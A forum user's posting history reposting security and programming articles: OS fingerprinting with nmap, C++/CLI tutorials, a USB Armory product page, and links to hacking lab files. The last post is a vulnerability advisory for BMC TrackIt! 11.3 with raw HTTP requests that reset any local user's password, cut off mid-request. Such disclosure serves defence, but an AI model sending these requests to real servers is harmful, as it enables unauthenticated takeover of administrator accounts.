Everything posted by Aerosol
-
InfoSec Institute

- Firewall Script Download: Download Files.
- Final Injector Source Code: Download Files.
- Securing Your Java Code: Download Files.
- STIX Phishing Example: Download Files.
- Java Bytecode Reverse Engineering Lab Files: Download Files.
- Hack I-Bank Pro Files: Download Files.
- Injecting Spyware in an EXE (Code Injection): Download Files.
- Applied Reverse Engineering w/ IDA Pro: Download Files.
- Reverse Engineering with Reflector: Download Files.
- Password Analysis: Download Files.
- Hooking System Calls Through MSRs: Download Files.
- Hooking IDT: Download Files.
- Android Hacking: Exploiting and Securing Android Application Components: Download Files.
- Android Hacking (Part 2): Content Provider Leakage: Download Files.
- Android Hacking (Part 3): Exploiting Broadcast Receivers: Download Files.
- Overview of Android Malware Analysis: Download Files.
- Assembly Programming with Visual Studio.NET: Download Files.
- Invoking Assembly Code in C#: Download Files.
- Buffer Overflow Attack & Defense: Download Files.
- Encrypted Code Reverse Engineering: Bypassing Obfuscation: Download Files.
- Why Google Chrome Extensions Are Secure (Browser Security): Download Files.
- Android Hacking & Security Part 6: Main Activity - Debug.
- OWASP Practice: Learn and Play from Scratch: Download SQL, Videos, VM.
- Guerilla Psychology and Tactical Approaches to Social Engineering: Download Files.
- Android Hacking: Root Detection & Evasion: Download Files.
- Android Hacking: Insecure Local Storage - Shared Preferences: zip, apk.
- Android Hacking Part 10: Insecure Local Storage: zip, external storage, internal storage, sqlitestorage.
- Android Hacking and Security, Part 12: rar, apk.
- Website Hacking 101: Download Files.
- Phishing WhatsApp Images Via USB: Download Files.
- Tracking Attackers with a Honeypot, Pt. 2 (Kippo): Download Files.
- Cracking Online Banking CAPTCHA Login Using Python: Download Files.
- Steganalysis: Your X-Ray Vision Through Hidden Data: Download Files.
- XXE Attacks: Download Files.
- Website Hacking Part IV: Tips for Better Website Security: Download Files.
- Android Hacking and Security, Part 13: Introduction to Drozer: Download Files.
- Android Hacking and Security, Part 14: Download Files.
- Website Hacking Part V: Download Files.

Ebooks:
- w3af Tutorial eBook
- Backtrack eBook
- Guide to the CISSP: The Domains
- Introduction to Enterprise Security: A Practitioner's Guide
-
For those of us in the information technology field, there are two reasons why we should understand operating system fingerprinting. The first reason is to better design and implement security controls in networks and local machines. The second reason is that effective OS fingerprinting is a vital penetration testing skill. If an attacker can identify the operating systems that run on specific target machines, they can then learn which exact vulnerabilities to exploit. Each and every OS in deployment has unique bugs and vulnerabilities. Once the exact OS is determined, it's easy to research what they are. That's often true even when bug reports haven't yet been sent to vendors and the corresponding patches have yet to be developed! So, hardening against OS fingerprinting can, in some cases, prevent zero-day attacks. OS fingerprinting techniques can be generalized into two categories: active and passive.

Active OS Fingerprinting

Active fingerprinting is a lot easier than passive fingerprinting, and is much more likely to return the information an attacker wants. The main reason why an attacker may prefer a passive approach is to reduce the risk of being caught by an IDS, IPS, or a firewall. It's still important to harden against active fingerprinting. It's the easier course of action for an attacker to execute, and they may decide to launch a DoS (denial of service) attack against network security systems first, in order to facilitate active fingerprinting. Active fingerprinting works by sending packets to a target and analyzing the packets that are sent back. Almost all active fingerprinting these days is done with Nmap. Nmap is usually used by network administrators to monitor the security of their networks. With Nmap, they can check that all of the firewalls in their network are properly configured, and they can also make sure that all of the TCP/IP stacks they maintain are functioning properly.
But like pretty much all security tools, Nmap is an effective application for both admins and attackers. Running an OS fingerprinting scan in Nmap is as simple as typing "nmap -A ip_address_or_domain_name_of_target". Here, I OS fingerprinted my own machine by targeting "localhost". Alternatively, you can do the same thing by targeting the IPv4 loopback address, 127.0.0.1. In the first pertinent line of the printout, I discovered that the Debian version of OpenSSH is running on port 22. That version of OpenSSH is only compatible with Debian-based Linux distros such as Ubuntu, Xubuntu, and of course, the original Debian. The second line I indicated in the printout is information that came directly from my OS kernel: it's Linux! The third line is information the Nmap scan got about the Samba server I'm running. It says I have Samba 3.6.9, the Unix version. Although the Unix and Linux kernels are different, Samba reports the Unix version for all Unix and Linux distros. So, if you put all three details together, you can infer that I'm running a Debian-based Linux distro. My machine is running Kubuntu 14.04. An attacker won't know to try to exploit vulnerabilities specific to the Linux kernel version in Kubuntu/Ubuntu 14.04, nor will they know to exploit vulnerabilities that are specific to KDE. But there are some vulnerabilities that apply to all current Debian-based OSes. An attacker would at least know where to start. When I ran that Nmap scan, it sent a number of TCP, UDP, and ICMP probes to my local machine. As I'm using a well-configured firewall, I didn't have many ports open. Nonetheless, Nmap sent probes to lots of different TCP/IP ports and analyzed what returned. Specific OSes and network service applications leave different types of data in their TCP, UDP, and ICMP packets. Nmap uses scripts that analyze that data to print out results that are useful for OS fingerprinting.
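The OS clues scattered through an Nmap printout (service banners, kernel hints, Samba versions) can also be collected programmatically. A minimal sketch in Python; the sample text below is an illustrative stand-in for real scan output, not an actual Nmap capture:

```python
import re

# Illustrative sample of nmap -A output (invented for this example, not real scan data)
SAMPLE = """\
22/tcp  open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.6.9 (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

def os_hints(nmap_output):
    """Collect the lines of an Nmap printout that hint at the target's OS."""
    hints = []
    for line in nmap_output.splitlines():
        if re.search(r"(Ubuntu|Debian|Linux|Windows|Samba|OS:)", line):
            hints.append(line.strip())
    return hints

for hint in os_hints(SAMPLE):
    print(hint)
```

Putting the matched lines side by side is exactly the inference described above: an Ubuntu OpenSSH banner plus a Unix Samba build plus a Linux kernel hint points at a Debian-based distro.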
It's sometimes possible to get inaccurate results. If you're unsure of the accuracy of the OS information in the Nmap printout, there's another command you can try: "sudo nmap -O -sV -T4 -d ip_address_or_domain_name_of_target". Using "sudo" is necessary, because the command requires root privileges in most versions of Nmap.

Passive OS Fingerprinting

Passive fingerprinting sniffs TCP/IP traffic, rather than generating network traffic by sending packets to the target. Hence, it's a more effective way of avoiding detection or being stopped by a firewall. As of this writing, the most frequently used tools for passive fingerprinting are NetworkMiner and Satori. NetworkMiner is developed to run in Windows, but there are both native Windows and GNU/Linux versions of Satori. If you're using a Debian-based, Fedora, or Arch Linux distro, you can still install NetworkMiner, but you'll need to install the Mono framework first. Keep in mind that if you install NetworkMiner in a Mono-compatible GNU/Linux distro, you won't be able to actively sniff packets. So if you're not using a Windows machine, I'd recommend Satori instead. Passive fingerprinting uses a pcap (packet capture) API. In GNU/Linux and BSD/Unix operating systems, pcap can be found in the libpcap library, and for Windows, there's a port of libpcap called WinPcap. While sniffing traffic, passive fingerprinting does its best to determine a target machine's OS by analyzing the initial Time To Live (TTL) in packet IP headers, and the TCP window size in the first packet of a TCP session, which is usually either a SYN (synchronize) or SYN/ACK (synchronize and acknowledge) packet. The Internet Engineering Task Force's (IETF) Request For Comments (RFC) documents recommend a default TTL of 64 for optimal functionality. (Note that the TTL is a hop count, decremented by each router a packet crosses, not a value in milliseconds.) But that's a mere recommendation, not a requirement. Passive fingerprinting can make a guess of a target's OS, because different OSes have different TCP/IP implementations.
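Because each router decrements the TTL by one, a sniffer observes the sender's initial TTL minus the hop count. Since common initial values cluster at 64, 128, and 255, the original value can usually be recovered by rounding up. A small sketch of that inference, my own illustration rather than code from any particular tool:

```python
def initial_ttl(observed_ttl):
    """Guess the sender's initial TTL by rounding up to common defaults (64/128/255)."""
    for default in (64, 128, 255):
        if observed_ttl <= default:
            return default
    return observed_ttl  # unusual value, return as-is

def hop_count(observed_ttl):
    """Estimated number of routers the packet crossed en route."""
    return initial_ttl(observed_ttl) - observed_ttl

print(initial_ttl(51), hop_count(51))    # a TTL of 51 likely started at 64, 13 hops away
print(initial_ttl(116), hop_count(116))  # a TTL of 116 likely started at 128, 12 hops away
```

This rounding heuristic is why the decremented TTL mentioned below only degrades, rather than destroys, the fingerprint.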
Typical packet specifications per OS are:

- Linux kernel versions 2.x: initial TTL 64, TCP window size 5840 bytes
- Android and Chrome OS: initial TTL 64, TCP window size 5720 bytes
- Windows XP: initial TTL 128, TCP window size 65535 bytes
- Windows 7 and Server 2008: initial TTL 128, TCP window size 8192 bytes
- Cisco routers: initial TTL 255, TCP window size 4128 bytes

But it's imperfect to rely on those typical figures. The TTL is decremented as a sniffed packet goes from router to router. TCP window sizes can change according to a number of variables, too. Hence, passive OS fingerprinting is less accurate than active OS fingerprinting, but may be the technique chosen by an attacker or penetration tester who wants to avoid detection. If you want to better hide the OSes that run on your network devices, a lot of work is necessary. Definitely run active and passive fingerprinting against your network first. Then you'll know what an attacker may be able to discover. Properly configured, implemented, and maintained IDSes, IPSes, and firewalls can mitigate active fingerprinting. Passive fingerprinting can be mitigated by ensuring that NICs (network interface cards) don't operate in promiscuous mode. Or if some NICs must operate promiscuously for the sake of functionality, watch them closely and on a regular basis! Make sure there are no hubs in your network. Use switches only, and configure them properly. Implementing strong encryption in as much of your network as possible also makes packet sniffing difficult for an attacker. And finally, check all of your network logs as frequently as you can. Often, all sorts of network attacks can be prevented by analyzing logs on a regular basis. They exist for a reason, you know!
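The typical figures above amount to a small signature table. A hedged sketch of the matching step, using only the (initial TTL, window size) pairs listed in this article; a real passive fingerprinter such as Satori or NetworkMiner consults far richer signature databases:

```python
# (initial TTL, TCP window size in bytes) -> likely OS, per the figures above
SIGNATURES = {
    (64, 5840): "Linux (kernel 2.x)",
    (64, 5720): "Android / Chrome OS",
    (128, 65535): "Windows XP",
    (128, 8192): "Windows 7 / Server 2008",
    (255, 4128): "Cisco router",
}

def guess_os(initial_ttl, window_size):
    """Best-effort OS guess; TTL decrements and window scaling make this fuzzy."""
    return SIGNATURES.get((initial_ttl, window_size), "unknown")

print(guess_os(64, 5840))   # Linux (kernel 2.x)
print(guess_os(128, 8192))  # Windows 7 / Server 2008
print(guess_os(64, 9999))   # unknown
```

The "unknown" fallback matters in practice: as noted above, window sizes vary with tuning, so an unmatched pair should lower confidence rather than force a guess.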
References

- Techniques in OS Fingerprinting (Nostromo): http://nostromo.joeh.org/osf.pdf
- Chatter on the Wire: OS Fingerprinting (chatteronthewire.org, Satori)
- Passive OS Fingerprinting (NETRESEC Blog)
- TCP/IP Fingerprinting Methods Supported by Nmap

Source
-
Abstract

This article outlines the rest of the C++/CLI object-oriented programming implementations, such as inheritance, interfaces and polymorphism. We'll understand the various control statements such as if, while and do-while, as well as other diverse loops, including the for loop and switch, by applying C++/CLI semantics under a CLR execution model. Apart from that, we'll be confronted with other significant notions such as exception handling, memory management, delegates and generics. Finally, this article illustrates how to mix implementations of native C++ code with managed C++/CLI code under the CLR.

Control Statements

Control statements define which code should be executed from given statements. C++/CLI proposes if/else, conditional operators and switches as control statements. The if/else construct syntax is very similar to C# coding: #include "stdafx.h" using namespace System; int main(array<System::String ^> ^args) { wchar_t ltr; Console::WriteLine("Enter the Letter"); ltr= Console::Read(); if (ltr >='a') if(ltr<='z') { Console::WriteLine("you have entered small Letter"); } if (ltr >='A') if(ltr<='Z') { Console::WriteLine("you have entered capital Letter"); } return 0; } The conditional operator in C++/CLI is known as a ternary operator. The first operand must evaluate to Boolean. If it is true, the first expression is evaluated; otherwise, the second one is: String^ str= i>5 ? "India" : "USA"; The switch construct is very similar to C#, but differs in that C++/CLI doesn't support strings in case selection. Instead, we have to use if/else.
The following sample illustrates this: wchar_t days; Console::WriteLine("1 = Sunday"); Console::WriteLine("2 = Monday"); Console::WriteLine("3 = Tuesday"); Console::WriteLine("Enter your choice"); days= Console::Read(); switch(days) { case '1': Console::WriteLine("Sunday"); break; case '2': Console::WriteLine("Monday"); break; case '3': Console::WriteLine("Tuesday"); break; default: Console::WriteLine("Out of Reach"); break; }

Loop Construct

C++/CLI defines for, for each, while and do-while loops. With loops, code is repeatedly executed until a condition is met. The for, while and do-while loops are syntactically similar to C#: //for loop for(int i=0;i<5;i++) { //statements } //while loop int x=0; while(x<3) { //statements } //do-while loop do { //statements }while(i<3); The for each loop is introduced by C++/CLI; it doesn't exist in ANSI C++. It works with any type that implements IEnumerable: array<int>^ arry= {1,2,3,4,5}; for each(int x in arry) { Console::WriteLine(x); }

Arrays

C++/CLI introduced the array keyword in order to implement arrays. The keyword uses a generic-like syntax with angle brackets, which define the element type. C++/CLI supports array initializers with the same syntax as C#: #include "stdafx.h" using namespace System; int main(array<System::String ^> ^args) { //Array Declaration array<int>^ a1={ 10,20,30,40,50 }; for each(int i in a1) { Console::WriteLine(i); } Console::ReadLine(); return 0; }

Static Members

Static members are defined with the static keyword, much like C#. A static field is instantiated only once for all objects of its type. We don't need to instantiate the class in order to access static members.
Instead, we can directly access them by using the class type name followed by the "::" operator: #include "stdafx.h" using namespace System; public ref class test { public: static int i; test() { i++; Console::WriteLine("Constructor Called :{0}",i); } }; int main(array<System::String ^> ^args) { test^ obj=gcnew test(); test^ obj1=gcnew test(); //direct access of static member Console::WriteLine(test::i); Console::Read(); return 0; }

Interface

The interface keyword is used to define an interface. Defining interfaces in C++/CLI is similar to C#, but the implementation is slightly different. A method that is declared in the interface must be implemented with the virtual keyword in the implementing class: public interface class IDisplay { void hello(); }; public ref class test: IDisplay { public: virtual void hello() { Console::WriteLine("Hello test"); } };

Inheritance

Inheritance is a mechanism in which base class members can be accessed in a corresponding derived class. All C++/CLI classes are derived classes by default, because both value and reference classes have a standard base class, System::Object. In the derived class declaration, the class name is followed by a colon and the base class name: public ref class baseClass { public: virtual void showBase() { Console::WriteLine("base class"); } }; public ref class test : baseClass { public: void showDerived() { Console::WriteLine("derived class"); } }; int main(array<System::String ^> ^args) { test^ t=gcnew test(); t->showBase(); t->showDerived(); return 0; } Access modifiers play a significant role in inheritance, controlling access to members inside and outside the assembly:

- public: all access.
- protected: access is possible only in the derived class.
- protected internal: allows accessing the members from within the same assembly, and from other assemblies if the type is derived from the base type.
- private: no access from outside the class.
- internal: access is possible within the same assembly.
- virtual: declares a method that supports polymorphism.
- override: overrides a virtual method in the derived class.
- new: hides a method from the base class.
- Classname:: references the base class.
- this: references the current object.
- sealed: stops a class from being inherited.

Abstract Class

Abstract classes are the C++/CLI equivalent of classes with pure virtual functions. They are defined with the abstract keyword, which prevents you from creating objects of that class type. Unlike interfaces, we can define the implementation (body) of a function in an abstract class. A polymorphic method implementation must be marked with the override keyword in the derived class: #include "stdafx.h" using namespace System; public ref class absClass abstract { public: virtual double square(int x) abstract; virtual void show() { Console::WriteLine("showing you in abstract class"); } }; public ref class test : absClass { public: virtual double square(int x) override { return x*x; } virtual void show() override { Console::WriteLine("showing you in derived class"); } }; int main(array<System::String ^> ^args) { test^ t=gcnew test(); Console::WriteLine("square is= {0}",t->square(20)); t->show(); Console::Read(); return 0; }

Exception Handling

C++/CLI defines the try, catch, throw and finally keywords in order to handle run time errors in code segments. The exception handling implementation is very similar to other CLR supported languages.
The following sample handles array out-of-bounds errors by employing exception handling (the loop deliberately runs one step past the last element): int main(array<System::String ^> ^args) { array<int>^ arry= {1,2,3}; try { for(int i=0;i<=arry->Length;i++) { Console::WriteLine(arry[i]); } } catch(Exception^ ex) { Console::WriteLine(ex); } finally { Console::WriteLine("Execution Done"); } Console::Read(); return 0; } The aforementioned sample throws a run time exception, which is handled by the try/catch block.

Delegates

Delegates are special types: type-safe pointers to methods. They are defined with the delegate keyword in the C++/CLI language: #include "stdafx.h" using namespace System; //delegate definition public delegate void testDel(int z); public ref class test { public: void square(int x) { Console::WriteLine("Square is={0}",x*x); } }; int main(array<System::String ^> ^args) { test^ t=gcnew test(); testDel^ td=gcnew testDel(t,&test::square); td(2); Console::Read(); return 0; }

Generic Functions

Generic functions appear to do the same thing as C++ function templates. Generic function specifications are compiled, and when you call a function that matches the generic function specification, the actual type is substituted for the type parameters at execution time. No extra code is generated at compilation time.
To define generic functions, C++/CLI uses C++-like angle brackets with type parameters that are replaced by the actual type when the function is called: #include "stdafx.h" using namespace System; generic<typename T> where T:IComparable T MaxElement(array<T>^ x) { T max=x[0]; for(int i=1; i< x->Length; i++) { if(max-> CompareTo(x[i]) < 0) { max=x[i]; } } return max; } int main(array<System::String ^> ^args) { array<int>^ iData= {3, 20, 4, 12, 7, 9}; int maxI= MaxElement(iData); Console::WriteLine("Max Integer is={0}",maxI); array<double>^ dData= {4.2, 2.12, 25.7,1.1}; double maxD= MaxElement(dData); Console::WriteLine("Max Double is={0}",maxD); Console::Read(); return 0; } The aforementioned sample produces the maximum element of an array using a generic function, in which the type isn't fixed at definition time. Instead it's determined at the call site, such as integer or double.

Resource Management

C++/CLI code can clean up memory resources by defining a destructor, which the compiler maps to an implementation of the IDisposable interface: public ref class test { public: ~test() { // release resources code } }; C# using statements release resources as soon as an object is no longer used; the compiler implicitly creates a try/finally statement and invokes the Dispose() method inside the finally block. C++/CLI can also use this approach, but handles it in a more elegant way with stack semantics: public ref class test { public: void hello() { Console::WriteLine("Hello test"); } }; int main(array<System::String ^> ^args) { //Releasing resources { test t; t.hello(); } Console::Read(); return 0; }

Native and Managed Code Mixing

C++/CLI offers one of its biggest advantages here: you can mix native C++ code with CLR managed code. This is referred to as "It Just Works" (IJW) in C++/CLI.
The following sample illustrates mixed code by calling the cout stream from the native C++ <iostream> header: #include "stdafx.h" #include <iostream> using namespace System; public ref class test { public: void managedCode() { Console::WriteLine("Hello test"); } //Native code function calling void nativeCode() { std::cout << "native code sample"; } }; int main(array<System::String ^> ^args) { test t; t.managedCode(); t.nativeCode(); return 0; }

Summary

It's not possible to cover each and every C++/CLI concept in a single article. This article outlined the remaining significant topics, such as arrays, control statements, generics, delegates and conditional statements, in detail, by defining their semantics. We also came to understand C++/CLI OOP concepts such as interfaces, polymorphism and inheritance by going through examples. After finishing this series of articles, one can write code in C++/CLI efficiently. Source
-
Abstract

This article illustrates the theory and principles behind C++/CLI programming in a .NET CLR context. We shall investigate the remarkable features of C++/CLI programming, for instance its advantages over the native C++ language in a CLR context. We'll run through the basic mechanism to create and execute CLR console and other application prototypes with the help of Visual Studio 2010. We'll also explore the semantics of the C++/CLI language in order to write and implement code. This segment also covers various significant aspects of a CLR C++ programming prototype in detail, regarding hardcore object oriented programming.

Science of C++/CLI

There are two fundamentally different kinds of C++ applications you can develop with VC++ 2010. You can write applications that natively execute on your computer. These applications are defined by the ISO/ANSI language standard, and referred to as native C++ programs. You can also write applications to run under the control of the CLR in an extended version of C++ defined by the ECMA-372 standard, called CLR programs or C++/CLI programs. The CLR is a standardized environment for the execution of programs written in a wide range of high-level languages including C#, VB and C++. The specification of the CLR is embodied in the ECMA standard for the CLI (Common Language Infrastructure). That's why C++ for the CLR is referred to as C++/CLI. The CLI is essentially a specification for a virtual machine environment that enables applications written in high-level languages to be executed in different system environments without recompiling source code. The CLI specifies a standard intermediate language (called MSIL) for the virtual machine, to which the high-level language source code is compiled. Code in MSIL is ultimately mapped to machine code by a JIT compiler when you execute a program. So, code in the CLI intermediate language can be executed within any other environment that has a CLI implementation.
Writing C++ Code

As we've noted earlier, you have two options for Windows applications: you can write code that executes under the CLR, or you can write code that compiles directly to machine code and thus executes natively. C++ code that executes under the CLR is described as managed C++, because data and code are managed by the CLR. The CLR may automatically release memory that you've allocated dynamically for storing data. This eliminates a source of common native C++ errors. C++ code that executes outside the CLR is referred to as unmanaged C++. Here C++/CLI poses a huge advantage over native C++: with unmanaged C++, you must take care of all aspects of allocating and releasing memory during execution of your program yourself, and you also have to shield your application from various security penetration breaches. Another big advantage of C++/CLI is the ability to mix native code with managed code. You can extend existing native C++ applications and add .NET functionality, and you can add .NET classes to native libraries so that they can be used in other .NET languages such as C# and VB.

C++/CLI "Hello World!" Project

This section explains the creation of a first "Hello World!" program in the C++/CLI programming language, using Visual Studio 2010. Although this is the simplest possible logic, we're just trying to display a string value with a CLR console based application, as in other C# console based applications. Here are the tutorial steps. First, make sure that the VC++ plugin is properly configured in Visual Studio 2010. If not, then re-install the software and during that process choose the VC++ options. Open Visual Studio 2010. Go to the File Menu, select New Project, and you will find the VC++ language plugin in the dialog box's left pane. Expand the VC++ node and select CLR. Then, choose CLR Console Application from the right pane. Finally, give the project a name such as "CLI_test" and hit OK.
Now open the CLI_test.cpp file from the solution explorer and enter this code: #include "stdafx.h" using namespace System; int main(array<System::String ^> ^args) { Console::WriteLine(L"Hello World"); Console::ReadLine(); return 0; } Finally, build the project and see the output in the console.

Files Created by Building the Console Application

- .exe: the executable file for the program.
- .obj: object files produced by the compiler, containing machine code from your program source files.
- .ilk: used by the linker when you rebuild your project.
- .pch: the pre-compiled header file.
- .idb: contains information used when you rebuild the application.
- .pdb: contains debugging information that is used when you execute the program in debug mode.

C++/CLI Terminology

This segment intends to kick start C++/CLI programming by outlining the essential core C++/CLI constructs, as well as object oriented programming related matters. We'll also introduce some advanced concept implementations, like generics, exception handling, delegates and memory management, using C++ syntax in the CLR arena.

Namespace

The .NET types are organized in a special container referred to as a namespace. It can embody types such as classes, interfaces, structures, properties, or methods. We have to specify a using namespace directive in the header portion of the file if we want to reference types from another assembly. We can define aliases in C++/CLI, but they can only reference another namespace, not classes. // import reference using namespace System; using namespace System::Text; //alias using abc= System::Windows::Forms; // namespace definition namespace test { namespace ajay { namespace champu { // code…… } } } Finally, we can't define a hierarchical namespace with one namespace statement; instead, the namespaces must be nested.

Class (Reference Type)

Classes are also referred to as reference types in C++/CLI.
A class and a structure have almost the same meaning here; the class/struct keyword alone doesn't separate reference types from value types as it does in C#. In C++/CLI, the ref keyword is used to define a managed class or structure. //class type public ref class testClass { }; //structure type public ref struct testStruct { }; Both structure and class bodies are surrounded by curly braces, and you must specify a semicolon at the end of the declaration. When working with reference type variables, their objects must be allocated on the managed heap. In C++/CLI, we use the handle operator ^ to declare a reference type variable. The gcnew operator allocates the memory on the managed heap, while the new keyword allocates space on the native heap. //Instantiation testClass^ obj=gcnew testClass(); testStruct^ obj1= gcnew testStruct(); obj1= nullptr; Assigning nullptr releases the handle's reference, similar to the C# null keyword.

Methods

Method declaration in C++/CLI is almost identical to C#, as methods are always defined within a class, with the exception that the access modifier is not part of the method declaration, but written before a group of members. public ref class testClass { public: void hello() { } }; Parameters can be passed both by value and by reference in C++/CLI. For passing by reference, we use the % operator, which is almost identical to the C# ref keyword and the C++ & operator. public: void display(int x) { } void operation(int% i) { } ………………… //Method calling int xyz=5; testClass^ obj=gcnew testClass(); obj->operation(xyz);

Constructor

A C++/CLI constructor has the same name as the class, like C#, but as with method declarations, the access modifier is written outside the constructor declaration.
public ref class testClass { public: testClass(String^ a) { this->a=a; } private: String^ a; };

Value Type

To declare a value type, C++/CLI uses the value keyword before the class or structure keyword. With value types, space is allocated on the stack. public value class testClass { }; The predefined value types under .NET and C++/CLI:

- wchar_t: 2 bytes, Char
- bool: 1 byte (true/false), Boolean
- short: 2 bytes, Int16
- int: 4 bytes, Int32
- long long: 8 bytes, Int64
- unsigned short: 2 bytes, UInt16
- unsigned int: 4 bytes, UInt32
- unsigned long long: 8 bytes, UInt64

Enumeration

Enumerations are defined with the enum keyword in the C++/CLI language. This implementation is almost identical to other .NET languages such as C#. public enum class color { RED,GREEN,BLUE,BLACK };

Properties

The C++/CLI language declares properties using the property keyword. The get accessor returns the property type, and the set accessor receives the new value as a parameter: public ref class testClass { private: String^ name; public: property String^ Name { String^ get() { return name; } void set(String^ value) { name=value; } } };

Prerequisites

Programmers are expected to have proficiency in native C++ object oriented programming, along with a deep understanding of building and executing C++ and C# applications under the .NET CLR.

Summary

This article depicted the importance and advantages of C++/CLI over the native C++ language. We came to understand the core anatomy of C++/CLI in a CLR context in detail. In this article, we've learned the syntax of various core concepts like value types, reference types, methods, and enumerations. The next articles in this series will explain the rest of the concepts, such as interfaces, inheritance, polymorphism, loops, arrays, etc. Source
-
https://player.vimeo.com/video/114250016

An open source USB stick computer for security applications. The USB Armory is a full-blown computer (800MHz ARM® processor, 512MB RAM) in a tiny form factor (65mm x 19mm x 6mm USB stick) designed from the ground up with information security applications in mind. Not only does the USB Armory have native support for many Linux distributions, it also has a completely open hardware design and a breakout prototyping header, making it a great platform on which to build other hardware.

FEATURES AND SPECIFICATIONS

Hardware:
- Freescale i.MX53 ARM® Cortex™-A8 800MHz
- 512MB DDR3 RAM
- USB host powered (<500mA)
- Dimensions: 65mm x 19mm x 6mm
- user-controllable LED
- 7-pin breakout header [pinout of GPIOs, UART, and power]
- microSD card slot [compatibility chart: https://github.com/inversepath/usbarmory/wiki/microSD-compatibility]
- 100% open source hardware [source files and wiki]

Software: The USB Armory hardware is supported by standard software environments and requires very little customization effort. In fact, vanilla Linux kernels and standard distributions run seamlessly on the tiny USB Armory board:
- boots off of microSD card [or via USB serial downloader]
- native support for Android, Debian, Ubuntu, FreeBSD [it's easy to create boot images]
- USB device emulation [CDC Ethernet, mass storage, HID, etc.]

Connectivity:
- High Speed USB 2.0 On-The-Go (OTG) with full device emulation
- full TCP/IP connection to/from the USB Armory via USB CDC Ethernet emulation
- flash drive functionality via USB mass storage device emulation
- serial communication over USB or physical UART

Security: The ability to emulate arbitrary USB devices, in combination with the i.MX53 SoC speed and fully customizable operating environment, makes the USB Armory an ideal platform for all kinds of personal security applications.
Not only is the USB Armory an excellent tool for testing the security of other devices, but it also has great security features itself:

ARM® TrustZone® secure boot + storage + RAM
user-fused keys for running only trusted firmware
optional secure mode detection LED indicator
minimal design limits scope of supply chain attacks
great auditability due to open hardware and software

The support for ARM® TrustZone®, in contrast to conventional trusted platform modules (TPMs), allows developers to engineer custom TPMs by enforcing domain separation between the “secure” and “normal” worlds that propagates throughout all SoC components, as opposed to being limited to the CPU core.

APPLICATIONS

$ ssh alice@10.0.0.1
Welcome to your USB armory
$ ?

The following example security application ideas illustrate the flexibility of the USB Armory concept:

mass storage device with advanced features such as automatic encryption, virus scanning, host authentication and data self-destruct
OpenSSH client and agent for untrusted hosts (e.g. Internet kiosks)
router for end-to-end VPN tunnelling
Tor bridge [see this, for example]
password manager with integrated web server
electronic wallet [the Electrum Bitcoin wallet works out of the box on the USB Armory. It has been tested with X11 forwarding from Linux as well as Windows hosts.]
authentication token
portable penetration testing platform
low level USB security testing

COMMUNITY

The USB Armory is an open source hardware and software project created by Inverse Path, an Italian information technology consulting group specializing in securing critical embedded systems in the avionic, automotive, and industrial control sectors. The Inverse Path team, with the help of the open source community, will develop applications that explore the potential of the USB Armory. Please participate!
project home
making-of presentation
public repositories
documentation wiki
discussion group

MANUFACTURING PLAN

Three major revisions of the USB Armory (alpha, beta and release candidate) have been prototyped and manufactured, a local Italian manufacturer has been selected, and the first batch is ready for production. The funds raised by this campaign will go toward covering the cost of parts, fabrication, assembly, and shipping. A margin for unexpected expenses and application development has been reserved, but otherwise the price has been kept as low as possible in order to make the USB Armory a reality. There are no bulk discounts or early bird deals to ensure that everyone has the possibility of obtaining the USB Armory at the lowest price. At present, an Italian board fabricator and assembly house will produce the USB Armory and all units will be shipped to backers of the campaign through Crowd Supply’s fulfillment service in the US.

First 40 Units Ship Immediately

The first 40 USB Armory units sold will be shipped as soon as the campaign has reached its funding goal. These units have already been produced as part of the final test batch and are identical to those that will be in the main production run, which will ship approximately six weeks after the campaign reaches its funding goal. Source
-
BMC TrackIt! 11.3 Unauthenticated Local User Password Change

Trial available here: http://www.trackit.com
A Metasploit pull request has been made here: https://github.com/rapid7/metasploit-framework/pull/4359

BMC TrackIt! 11.3, when installed with TrackItWeb!, allows an unauthenticated user to change any local user's password, such as Administrator's. If the ability to log in remotely via SMB is enabled on the server, this can yield an unauthenticated user a SYSTEM shell using the psexec module in Metasploit. This was tested against Windows Server 2008 R2 in a relatively default installation (TrackIt installs SQL Server). A domain was set up and the web server was added to the domain. Domain credentials could not be set, only local users'.

When using the Registration link in the top right of the /PasswordReset/Application/Main page, the UI requires the user's password to continue. However, the request that actually registers the local user is separate from the authentication request and can be sent independently. This allows an unauthenticated user to register any local user and then reset that user's password. Because the Password Reset form makes a separate, distinct request to check the answers to the secret questions, the request that actually changes a user's password can be made as any user.
The first request looks like:

POST /PasswordReset/Application/Register HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset
Content-Length: 318
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

domainname=WIN-P3AET0NFP1N&userName=Administrator&emailaddress=fdjhsahjfd%40fdsafdsa.com&userQuestions=[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]&updatequesChk=false&SelectedQuestion=1&SelectedQuestion=2&answer=not&answer=not&confirmanswer=not&confirmanswer=not

A valid ASP.NET_SessionId is required; one can be obtained with a GET to /PasswordReset/, using the value from the resulting Set-Cookie header as the cookie in all subsequent requests. The domainname parameter can be the name of the computer, which is the default value on the registration page. The userName parameter is the user to register with the application. You can attempt this with a user who is already registered with no issue (though changing that user's secret answers to known values is probably bad too).
The second request looks like this:

POST /PasswordReset/Application/ResetPassword HTTP/1.1
Host: 192.168.1.57
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.57/PasswordReset/Application/Main
Content-Length: 92
Cookie: ASP.NET_SessionId=oyxdhg2obxlcxv30p2z0heot; UserName=Administrator
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

